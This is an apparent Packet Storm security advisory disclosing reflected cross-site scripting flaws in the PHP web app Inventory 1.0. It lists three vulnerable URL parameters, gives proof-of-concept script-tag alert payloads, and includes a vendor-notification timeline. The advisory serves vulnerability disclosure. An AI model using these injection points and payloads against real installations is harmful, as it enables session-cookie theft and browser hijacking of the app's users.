Inventory version 1.0 suffers from multiple cross site scripting vulnerabilities.
1292d00cbc8131c9d80118a786712087616de0bf11a88f616f6a7005190143b5# Exploit Title: Inventory 1.0 Multiple XSS Vulnerabilities
# Date: 10/19/12
# Author: G13
# Twitter: @g13net
# Software Site: https://github.com/farevalod/inventory
# Version: 1.0
# Category: webapp (php)
# dc585
##### ToC #####
0x01 Description
0x02 XSS
0x03 Vendor Notification
##### 0x01 Description #####
PHP + SQL Inventory tracking system
##### 0x02 XSS #####
The Inventory application has multiple pages and parameters that are
vulnerable to cross-site scripting. This
vulnerabilities could be used to steal session cookies or take control
of a client's browser.
-----Vulnerable Pages-----
http://localhost/inventory/consulta_fact.php?fact_num=[XSS]
http://localhost/inventory/newinventario.php?sn=[XSS]
http://localhost/inventory/newtransact.php?ref=[XSS]
-----PoC Exploit-----
http://localhost/inventory/consulta_fact.php?fact_num=<script>alert(1)</script>
http://localhost/inventory/newinventario.php?sn=<script>alert(100)</script>
http://localhost/inventory/newtransact.php?ref=<script>alert(100)</script>
##### 0x03 Vendor Notification #####
10/19/12 - Vendor Notified
10/26/12 - No response, disclosure
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed